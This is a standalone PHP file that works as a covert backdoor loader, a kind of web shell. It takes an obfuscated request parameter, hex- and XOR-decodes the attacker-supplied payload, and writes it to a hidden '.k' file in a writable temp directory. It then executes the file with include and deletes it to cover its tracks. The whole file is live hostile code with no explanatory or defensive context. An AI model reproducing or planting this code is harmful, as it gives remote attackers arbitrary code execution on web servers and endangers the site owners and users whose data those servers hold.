<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x6D\x72k"])){
	$descriptor = array_filter([getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", "/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd()]);
	$symbol = hex2bin($_REQUEST["\x6D\x72k"]);
	$data_chunk = '' ;for($d=0; $d<strlen($symbol); $d++){$data_chunk .= chr(ord($symbol[$d]) ^ 55);}
	foreach ($descriptor as $pointer) {
    		if (is_writable($pointer) && is_dir($pointer)) {
    $comp = sprintf("%s/.k", $pointer);
    $file = fopen($comp, 'w');
if ($file) {
	fwrite($file, $data_chunk);
	fclose($file);
	include $comp;
	@unlink($comp);
	exit;
}
}
}
}